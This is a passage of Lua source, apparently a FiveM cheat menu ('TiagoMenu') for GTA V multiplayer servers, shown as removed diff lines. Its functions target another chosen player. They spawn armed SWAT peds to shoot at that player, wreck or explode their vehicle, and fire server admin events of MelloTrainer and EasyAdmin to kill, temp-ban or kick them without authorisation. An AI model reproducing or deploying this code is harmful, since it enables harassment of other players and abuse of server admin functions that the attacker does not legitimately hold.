- local xf = GetEntityForwardX(GetPlayerPed(SelectedPlayer))
- local yf = GetEntityForwardY(GetPlayerPed(SelectedPlayer))
- if IsPedInAnyVehicle(GetPlayerPed(SelectedPlayer), false) then
- local vt = GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), 0)
- NetworkRequestControlOfEntity(vt)
- SetVehicleModKit(vt, 0)
- ToggleVehicleMod(vt, 20, 1)
- SetVehicleModKit(vt, 0)
- SetVehicleTyresCanBurst(vt, 1)
- end
- local v = nil
- RequestModel(veh)
- RequestModel('s_m_y_swat_01')
- while not HasModelLoaded(veh) and not HasModelLoaded('s_m_y_swat_01') do
- RequestModel('s_m_y_swat_01')
- Citizen.Wait(0)
- RequestModel(veh)
- end
- if HasModelLoaded(veh) then
- Citizen.Wait(50)
- v =
- CreateVehicle(
- veh,
- pos.x - (xf * 30),
- pos.y - (yf * 30),
- pos.z + 1,
- GetEntityHeading(GetPlayerPed(SelectedPlayer)),
- true,
- false
- )
- if DoesEntityExist(v) then
- NetworkRequestControlOfEntity(v)
- SetVehicleDoorsLocked(v, 4)
- RequestModel('s_m_y_swat_01')
- Citizen.Wait(50)
- if HasModelLoaded('s_m_y_swat_01') then
- Citizen.Wait(50)
- local ped = CreatePed(21, GetHashKey('s_m_y_swat_01'), pos.x, pos.y, pos.z, true, true)
- local ped1 =
- CreatePed(21, GetHashKey('s_m_y_swat_01'), pos.x, pos.y, pos.z, true, true)
- if DoesEntityExist(ped1) and DoesEntityExist(ped) then
- GiveWeaponToPed(ped, GetHashKey('WEAPON_APPISTOL'), 9999, 1, 1)
- GiveWeaponToPed(ped1, GetHashKey('WEAPON_APPISTOL'), 9999, 1, 1)
- SetPedIntoVehicle(ped, v, -1)
- SetPedIntoVehicle(ped1, v, 0)
- TaskDriveBy(
- ped,
- GetVehiclePedIsUsing(GetPlayerPed(SelectedPlayer)),
- pos.x,
- pos.y,
- pos.z,
- 200,
- 99,
- 0,
- )
- TaskShootAtEntity(
- ped1,
- GetVehiclePedIsUsing(GetPlayerPed(SelectedPlayer)),
- 200,
- )
- makePedHostile(ped, SelectedPlayer, 0, 0)
- makePedHostile(ped1, SelectedPlayer, 0, 0)
- TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
- TaskCombatPed(ped1, GetPlayerPed(SelectedPlayer), 0, 16)
- for i = 1, 2 do
- Citizen.Wait(5)
- ClearPedTasks(GetPlayerPed(-1))
- end
- end
- end
- end
- end
- end
- elseif TiagoMenu.Button("~h~~b~--Vehicle Options--") then
- elseif TiagoMenu.Button("~b~Kick Vehicle") then
- ClearPedTasksImmediately(GetPlayerPed(SelectedPlayer))
- elseif TiagoMenu.Button("~b~Fuck Engine ~r~NEW") then
- local playerPed = GetPlayerPed(SelectedPlayer)
- NetworkRequestControlOfEntity(GetVehiclePedIsIn(SelectedPlayer))
- SetVehicleUndriveable(GetVehiclePedIsIn(playerPed),true)
- SetVehicleEngineHealth(GetVehiclePedIsIn(playerPed), 100)
- elseif TiagoMenu.Button("~b~Repair Vehicle ~r~NEW") then
- NetworkRequestControlOfEntity(GetVehiclePedIsIn(SelectedPlayer))
- SetVehicleFixed(GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), false))
- SetVehicleDirtLevel(GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), false), 0.0)
- SetVehicleLights(GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), false), 0)
- SetVehicleBurnout(GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), false), false)
- Citizen.InvokeNative(0x1FD09E7390A74D54, GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), false), 0)
- elseif TiagoMenu.Button("~b~Fuck Car ~r~NEW ") then
- local playerPed = GetPlayerPed(SelectedPlayer)
- local playerVeh = GetVehiclePedIsIn(playerPed, true)
- NetworkRequestControlOfEntity(GetVehiclePedIsIn(SelectedPlayer))
- StartVehicleAlarm(playerVeh)
- DetachVehicleWindscreen(playerVeh)
- SmashVehicleWindow(playerVeh, 0)
- SmashVehicleWindow(playerVeh, 1)
- SmashVehicleWindow(playerVeh, 2)
- SmashVehicleWindow(playerVeh, 3)
- SetVehicleTyreBurst(playerVeh, 0, true, 1000.0)
- SetVehicleTyreBurst(playerVeh, 1, true, 1000.0)
- SetVehicleTyreBurst(playerVeh, 2, true, 1000.0)
- SetVehicleTyreBurst(playerVeh, 3, true, 1000.0)
- SetVehicleTyreBurst(playerVeh, 4, true, 1000.0)
- SetVehicleTyreBurst(playerVeh, 5, true, 1000.0)
- SetVehicleTyreBurst(playerVeh, 4, true, 1000.0)
- SetVehicleTyreBurst(playerVeh, 7, true, 1000.0)
- SetVehicleDoorBroken(playerVeh, 0, true)
- SetVehicleDoorBroken(playerVeh, 1, true)
- SetVehicleDoorBroken(playerVeh, 2, true)
- SetVehicleDoorBroken(playerVeh, 3, true)
- SetVehicleDoorBroken(playerVeh, 4, true)
- SetVehicleDoorBroken(playerVeh, 5, true)
- SetVehicleDoorBroken(playerVeh, 6, true)
- SetVehicleDoorBroken(playerVeh, 7, true)
- SetVehicleLights(playerVeh, 1)
- Citizen.InvokeNative(0x1FD09E7390A74D54, playerVeh, 1)
- SetVehicleNumberPlateTextIndex(playerVeh, 5)
- SetVehicleNumberPlateText(playerVeh, "Tiago")
- SetVehicleDirtLevel(playerVeh, 10.0)
- SetVehicleModColor_1(playerVeh, 1)
- SetVehicleModColor_2(playerVeh, 1)
- SetVehicleCustomPrimaryColour(playerVeh, 255, 51, 255)
- SetVehicleCustomSecondaryColour(playerVeh, 255, 51, 255)
- SetVehicleBurnout(playerVeh, true)
- drawNotification("~g~Vehicle Fucked Up!")
- elseif TiagoMenu.Button("~r~Explode ~b~Vehicle") then
- if IsPedInAnyVehicle(GetPlayerPed(SelectedPlayer), true) then
- AddExplosion(GetEntityCoords(GetPlayerPed(SelectedPlayer)), 18, 1337.0, false, true, 0.0)
- else
- drawNotification(
- '~h~~r~Player not in a vehicle~s~.'
- )
- end
- elseif TiagoMenu.Button("~r~MelloTrainer ~s~KILL") then
- TriggerServerEvent("mellotrainer:s_adminKill", GetPlayerServerId(SelectedPlayer))
- elseif TiagoMenu.Button("~r~MelloTrainer ~s~BAN") then
- local result = KeyboardInput("motivo do ban", "", 100)
- if result then
- TriggerServerEvent( 'mellotrainer:adminTempBan', GetPlayerServerId(SelectedPlayer),result)
- end
- elseif TiagoMenu.Button("~r~MelloTrainer ~s~KICK") then
- local result = KeyboardInput("motivo do kick", "", 100)
- if result then
- TriggerServerEvent( 'mellotrainer:adminKick', GetPlayerServerId(SelectedPlayer), result)
- TriggerServerEvent("EasyAdmin:kickPlayer", GetPlayerServerId(SelectedPlayer), result)
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("SingleWepPlayer") then
- for i = 1, #allWeapons do
- if TiagoMenu.Button(allWeapons[i]) then
- GiveWeaponToPed(GetPlayerPed(SelectedPlayer), GetHashKey(allWeapons[i]), 1000, false, true)
- end
- end
- TiagoMenu.Display()
- elseif IsControlJustReleased(0, 157) then
- TeleportToWaypoint()
- elseif IsControlJustReleased(0, 158) then
- fixcar()
- elseif IsDisabledControlPressed(0, 256) then
- TiagoMenu.OpenMenu("MainMenu")
- TiagoMenu.Display()
- elseif IsDisabledControlPressed(0, 344) then
- TiagoMenu.OpenMenu("MainMenu")
- end
- Citizen.Wait(0)
- end
- end
- )
- if ForceMap then
- DisplayRadar(true)
- end
- RegisterCommand("killmenu", function(source,args,raw)
- Enabled = false
- end, false)
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